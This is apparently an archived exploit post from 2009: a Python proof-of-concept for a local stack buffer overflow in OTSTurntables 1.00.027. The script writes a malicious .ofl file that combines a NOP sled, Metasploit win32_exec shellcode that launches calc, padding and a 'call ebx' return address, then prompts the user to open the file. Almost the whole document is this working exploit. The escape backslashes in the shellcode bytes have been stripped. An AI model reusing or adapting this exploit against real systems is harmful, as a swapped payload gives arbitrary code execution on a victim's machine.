otsturntablesofl-overflow.txt
Posted on 14 January 2009
# OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit # Discovered & exploited bY suN8Hclf # crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net # Tested on: Windows XP SP2 Polish Full patched # # Only 274 bytes for shellcode. Wanna more, exploit SEH !!! # # Thanks to Myo and to everyone who knows what hacking really is # Not for money dude, only for fun !!! print "=====================================================================" print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit" print " bY suN8Hclf (crimson.loyd@gmail.com)" print "=====================================================================" nops = "x90" * 4 ret = "x75x52x46"; # call ebx # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9" "x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05" "xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09" "x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d" "xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26" "x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64" "xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb" "xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28" "xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44" "x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38" "xacx2cxc9x40" ) num = 276 - 4 - 160 buff = "x41" * num exploit = nops + shellcode + buff + ret try: out_file = open("open_me.ofl",'w') out_file.write(exploit) out_file.close() raw_input(" Now open open_me.ofl file to exploit bug! ") except: print "WTF?"
